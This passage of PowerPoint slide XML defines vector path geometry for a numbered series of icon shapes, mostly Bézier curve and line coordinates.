                  <a:pt x="21600" y="10178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8"/>
                  <a:pt x="19518" y="3199"/>
                  <a:pt x="18594" y="2422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7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7" name="Shape 2857"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425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7"/>
                  <a:pt x="17673" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="6787"/>
                  <a:pt x="17339" y="6294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89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5"/>
                  <a:pt x="10556" y="16200"/>
                  <a:pt x="10800" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11273" y="16200"/>
                  <a:pt x="11689" y="15973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2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3476" y="16840"/>
                  <a:pt x="3436" y="16279"/>
                  <a:pt x="3436" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3436" y="14763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6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9431" y="15253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6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3608" y="17469"/>
                  <a:pt x="3573" y="17430"/>
                  <a:pt x="3539" y="17392"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="3075" y="11369"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2361" y="10869"/>
                  <a:pt x="1683" y="10321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6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3"/>
                  <a:pt x="3936" y="11937"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4379" y="10266"/>
                  <a:pt x="5100" y="8708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4"/>
                  <a:pt x="7855" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="5688"/>
                  <a:pt x="7813" y="5493"/>
                  <a:pt x="7739" y="5317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0"/>
                  <a:pt x="11005" y="1707"/>
                  <a:pt x="10354" y="2081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5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7"/>
                  <a:pt x="15149" y="8393"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14827" y="9199"/>
                  <a:pt x="14443" y="9973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3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8" name="Shape 2858"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639079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1"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2993" y="5240"/>
                  <a:pt x="6615" y="5891"/>
                  <a:pt x="10800" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14986" y="5891"/>
                  <a:pt x="18607" y="5240"/>
                  <a:pt x="20400" y="4291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="4291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2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2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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2993" y="11131"/>
                  <a:pt x="6615" y="11782"/>
                  <a:pt x="10800" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14986" y="11782"/>
                  <a:pt x="18607" y="11131"/>
                  <a:pt x="20400" y="10182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="10182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3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3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2"/>
                  <a:pt x="6615" y="17673"/>
                  <a:pt x="10800" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14986" y="17673"/>
                  <a:pt x="18607" y="17022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7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8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1"/>
                  <a:pt x="4835" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16765" y="21600"/>
                  <a:pt x="21600" y="20281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8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7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59" name="Shape 2859"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947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5" y="7236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6892" y="7530"/>
                  <a:pt x="6793" y="7869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0" name="Shape 2860"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208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1" name="Shape 2861"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560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2" name="Shape 2862"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821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0672" y="6382"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10464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9" y="11643"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8462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7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2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3" name="Shape 2863"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082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5" y="8897"/>
                  <a:pt x="11997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2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2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8"/>
                  <a:pt x="14281" y="687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4" name="Shape 2864"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343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5" y="7359"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13743" y="7359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5" y="11283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14725" y="9816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16205" y="9816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16205" y="8833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14725" y="8833"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14725" y="8833"/>
                  <a:pt x="14725" y="7359"/>
                  <a:pt x="14725" y="7359"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9321" y="13946"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8620" y="13946"/>
                  <a:pt x="8071" y="13495"/>
                  <a:pt x="8071" y="12919"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8071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7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40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2"/>
                  <a:pt x="8574" y="8014"/>
                  <a:pt x="8754" y="7806"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8864" y="7680"/>
                  <a:pt x="9006" y="7613"/>
                  <a:pt x="9164" y="7613"/>
                </a:cubicBez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5" y="9596"/>
                  <a:pt x="9970" y="9809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9860" y="9935"/>
                  <a:pt x="9722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6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6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5"/>
                  <a:pt x="11386" y="8784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11386" y="8342"/>
                  <a:pt x="11262" y="7947"/>
                  <a:pt x="11050" y="7659"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11238" y="7659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5" y="6873"/>
                  <a:pt x="7345" y="7759"/>
                  <a:pt x="7345" y="8769"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7345" y="9812"/>
                  <a:pt x="8109" y="10605"/>
                  <a:pt x="9137" y="10648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3" y="11309"/>
                  <a:pt x="6870" y="12161"/>
                  <a:pt x="6870" y="13167"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6870" y="14071"/>
                  <a:pt x="7903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5" name="Shape 2865"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604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6" name="Shape 2866"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8917865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7" name="Shape 2867"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126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6"/>
                  <a:pt x="13722" y="13990"/>
                  <a:pt x="13643" y="13857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6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0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8" name="Shape 2868"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387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0" y="14627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69" name="Shape 2869"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648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0" name="Shape 2870"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="333104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0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0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0"/>
                  <a:pt x="11487" y="8460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8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1" name="Shape 2871"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560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3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9"/>
                  <a:pt x="10353" y="9000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2" name="Shape 2872"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821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3" name="Shape 2873"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082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8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4" name="Shape 2874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343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8" y="14762"/>
                  <a:pt x="11688" y="14621"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11688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8" y="10446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11688" y="11888"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11788" y="11782"/>
                  <a:pt x="12037" y="11558"/>
                  <a:pt x="12347" y="11558"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12752" y="11558"/>
                  <a:pt x="12905" y="11896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1" y="9334"/>
                  <a:pt x="7074" y="9430"/>
                  <a:pt x="7074" y="9430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6234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4" y="16104"/>
                  <a:pt x="7074" y="16104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7074" y="16104"/>
                  <a:pt x="8905" y="16200"/>
                  <a:pt x="10800" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12631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0"/>
                  <a:pt x="14527" y="9430"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11992" y="12090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11860" y="12090"/>
                  <a:pt x="11757" y="12167"/>
                  <a:pt x="11688" y="12243"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11688" y="14276"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11751" y="14345"/>
                  <a:pt x="11848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2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3" y="6332"/>
                  <a:pt x="10471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1" y="8348"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10303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  <a:moveTo>
                  <a:pt x="12398" y="8801"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12803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50" y="8348"/>
                  <a:pt x="12550" y="8197"/>
                  <a:pt x="12550" y="8197"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12550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2" y="8801"/>
                  <a:pt x="12398" y="880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5" name="Shape 2875"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604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2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10463" y="6409"/>
                  <a:pt x="10255" y="6435"/>
                  <a:pt x="10045" y="6460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9652" y="6558"/>
                  <a:pt x="9223" y="6650"/>
                  <a:pt x="8905" y="6836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8055" y="7333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4" y="12166"/>
                  <a:pt x="8358" y="11987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8416" y="11889"/>
                  <a:pt x="8403" y="11758"/>
                  <a:pt x="8438" y="11643"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8462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2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4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8"/>
                  <a:pt x="13131" y="8637"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13292" y="9010"/>
                  <a:pt x="13339" y="9724"/>
                  <a:pt x="13227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8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1"/>
                  <a:pt x="10865" y="10349"/>
                  <a:pt x="11026" y="9733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11179" y="9146"/>
                  <a:pt x="10888" y="8683"/>
                  <a:pt x="10431" y="8575"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9863" y="8439"/>
                  <a:pt x="9424" y="8966"/>
                  <a:pt x="9274" y="9310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9155" y="9584"/>
                  <a:pt x="9083" y="10089"/>
                  <a:pt x="9177" y="10453"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9208" y="10569"/>
                  <a:pt x="9347" y="10878"/>
                  <a:pt x="9322" y="10986"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9213" y="11462"/>
                  <a:pt x="9088" y="11974"/>
                  <a:pt x="8953" y="12441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8812" y="12929"/>
                  <a:pt x="8736" y="13427"/>
                  <a:pt x="8599" y="13898"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8536" y="14114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40" y="15108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599" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8800" y="16194"/>
                  <a:pt x="9078" y="15665"/>
                  <a:pt x="9177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49" y="13569"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10025" y="13329"/>
                  <a:pt x="10133" y="13049"/>
                  <a:pt x="10158" y="12786"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10174" y="12786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2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5" y="11567"/>
                  <a:pt x="14513" y="11064"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14596" y="10817"/>
                  <a:pt x="14613" y="10543"/>
                  <a:pt x="14674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4"/>
                  <a:pt x="10672" y="63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6" name="Shape 2876"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8917865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49"/>
                  <a:pt x="12232" y="8849"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12732" y="8849"/>
                  <a:pt x="12952" y="9108"/>
                  <a:pt x="12893" y="9624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2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2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5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1"/>
                  <a:pt x="13709" y="12317"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15001" y="10780"/>
                  <a:pt x="15669" y="9570"/>
                  <a:pt x="15713" y="8686"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15772" y="7503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7" name="Shape 2877"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126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19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4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2"/>
                  <a:pt x="8574" y="8014"/>
                  <a:pt x="8754" y="7806"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8864" y="7680"/>
                  <a:pt x="9006" y="7612"/>
                  <a:pt x="9163" y="7612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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10237" y="9239"/>
                  <a:pt x="10154" y="9595"/>
                  <a:pt x="9969" y="9809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1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2"/>
                  <a:pt x="11262" y="7947"/>
                  <a:pt x="11049" y="7660"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11238" y="7660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12276" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9463" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8334" y="6873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8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8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8" name="Shape 2878"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387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79" name="Shape 2879"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648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6"/>
                  <a:pt x="9187" y="8553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6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0" name="Shape 2880"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="3864307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6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1"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13046" y="13020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4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5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6"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13280" y="13606"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12921" y="13524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4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8"/>
                  <a:pt x="13698" y="14338"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13741" y="14155"/>
                  <a:pt x="13722" y="13989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6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8067" y="6872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8000" y="6890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5"/>
                  <a:pt x="10190" y="14645"/>
                  <a:pt x="10449" y="14719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10573" y="14722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10512" y="11390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1" name="Shape 2881"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560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6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6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9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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10799" y="16692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14001" y="14627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14001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1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2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79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79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7" y="11715"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10787" y="11715"/>
                  <a:pt x="7641" y="9766"/>
                  <a:pt x="7641" y="976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2" name="Shape 2882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821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3" name="Shape 2883"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082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4"/>
                  <a:pt x="15213" y="9425"/>
                  <a:pt x="15213" y="8918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8" y="8460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0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0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10652" y="10591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9560" y="13866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7742" y="8460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2" y="8380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4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8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8" y="8460"/>
                  <a:pt x="11488" y="8460"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="15709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10319" y="15709"/>
                  <a:pt x="9857" y="15637"/>
                  <a:pt x="9418" y="15508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9" y="15174"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6985" y="14362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4" name="Shape 2884"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="4397568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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12783" y="9001"/>
                  <a:pt x="13728" y="8390"/>
                  <a:pt x="14592" y="7682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15222" y="8448"/>
                  <a:pt x="15619" y="9407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7" y="12618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5"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="15709"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9746" y="15709"/>
                  <a:pt x="8772" y="15374"/>
                  <a:pt x="7971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7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0" y="10800"/>
                  <a:pt x="9312" y="10469"/>
                  <a:pt x="10852" y="9873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11015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7" y="7279"/>
                  <a:pt x="9793" y="8098"/>
                  <a:pt x="10353" y="9001"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8991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2" y="6982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13087" y="7622"/>
                  <a:pt x="12217" y="8174"/>
                  <a:pt x="11282" y="8612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10732" y="7702"/>
                  <a:pt x="10073" y="6869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5" name="Shape 2885"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409997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7"/>
                  <a:pt x="13996" y="15061"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13870" y="15061"/>
                  <a:pt x="13731" y="15061"/>
                  <a:pt x="13646" y="15044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19"/>
                  <a:pt x="14840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3" y="13635"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6433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3" y="15708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6433" y="14316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5" y="13704"/>
                  <a:pt x="8630" y="13381"/>
                  <a:pt x="8630" y="13000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8630" y="12618"/>
                  <a:pt x="8439" y="12296"/>
                  <a:pt x="8155" y="12099"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7858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4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1" y="14380"/>
                  <a:pt x="10891" y="14623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10891" y="14877"/>
                  <a:pt x="10646" y="15044"/>
                  <a:pt x="10184" y="15044"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9755" y="15044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6"/>
                  <a:pt x="10124" y="15766"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11346" y="15766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6" name="Shape 2886"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8943258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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13646" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13646" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12636" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12636" y="11816"/>
                  <a:pt x="12636" y="15709"/>
                  <a:pt x="126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6"/>
                  <a:pt x="10086" y="12475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10099" y="12475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10165" y="12706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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8113" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9155" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9472" y="14710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10746" y="14710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11089" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12172" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10792" y="11816"/>
                  <a:pt x="9472" y="11816"/>
                  <a:pt x="9472" y="11816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7" name="Shape 2887"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9476519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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14845" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14845" y="14144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16443" y="14144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16443" y="13428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14845" y="13428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14845" y="12538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16555" y="12538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16555" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13836" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13836" y="11816"/>
                  <a:pt x="13836" y="15709"/>
                  <a:pt x="138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8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1"/>
                  <a:pt x="11900" y="13699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6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9"/>
                  <a:pt x="10178" y="15749"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11048" y="15749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3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9"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6623" y="13659"/>
                  <a:pt x="6518" y="13653"/>
                  <a:pt x="6432" y="13636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6432" y="12486"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6505" y="12469"/>
                  <a:pt x="6643" y="12452"/>
                  <a:pt x="6848" y="12452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7350" y="12452"/>
                  <a:pt x="7634" y="12665"/>
                  <a:pt x="7634" y="13023"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7634" y="13422"/>
                  <a:pt x="7304" y="13659"/>
                  <a:pt x="6769" y="13659"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6796" y="11787"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6182" y="11787"/>
                  <a:pt x="5746" y="11822"/>
                  <a:pt x="5436" y="11868"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5436" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6432" y="15709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5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2"/>
                  <a:pt x="7416" y="11787"/>
                  <a:pt x="6796" y="1178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8" name="Shape 2888"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10009781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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13945" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13945" y="14144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15543" y="14144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15543" y="13428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13945" y="13428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13945" y="12538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15655" y="12538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15655" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12936" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12936" y="11816"/>
                  <a:pt x="12936" y="15709"/>
                  <a:pt x="12936" y="15709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9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12145" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12145" y="11816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11136" y="11816"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11136" y="11816"/>
                  <a:pt x="11136" y="15709"/>
                  <a:pt x="11136" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8395" y="14167"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9082" y="14167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9082" y="14981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6"/>
                  <a:pt x="8672" y="11776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7213" y="11776"/>
                  <a:pt x="6138" y="12515"/>
                  <a:pt x="6131" y="13809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6124" y="14381"/>
                  <a:pt x="6349" y="14888"/>
                  <a:pt x="6758" y="15223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7167" y="15570"/>
                  <a:pt x="7755" y="15749"/>
                  <a:pt x="8566" y="15749"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9155" y="15749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7"/>
                  <a:pt x="8395" y="1416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89" name="Shape 2889"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10543042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9"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9923" y="13659"/>
                  <a:pt x="9818" y="13653"/>
                  <a:pt x="9732" y="13636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9732" y="12486"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9805" y="12469"/>
                  <a:pt x="9943" y="12452"/>
                  <a:pt x="10148" y="12452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10650" y="12452"/>
                  <a:pt x="10934" y="12665"/>
                  <a:pt x="10934" y="13023"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10934" y="13422"/>
                  <a:pt x="10604" y="13659"/>
                  <a:pt x="10069" y="13659"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10096" y="11787"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9481" y="11787"/>
                  <a:pt x="9046" y="11822"/>
                  <a:pt x="8736" y="11869"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8736" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9732" y="15709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5"/>
                  <a:pt x="11931" y="13382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1"/>
                  <a:pt x="12349" y="14888"/>
                  <a:pt x="12758" y="15224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13167" y="15571"/>
                  <a:pt x="13755" y="15749"/>
                  <a:pt x="14566" y="15749"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15155" y="15749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7"/>
                </a:lnTo>
                <a:lnTo>
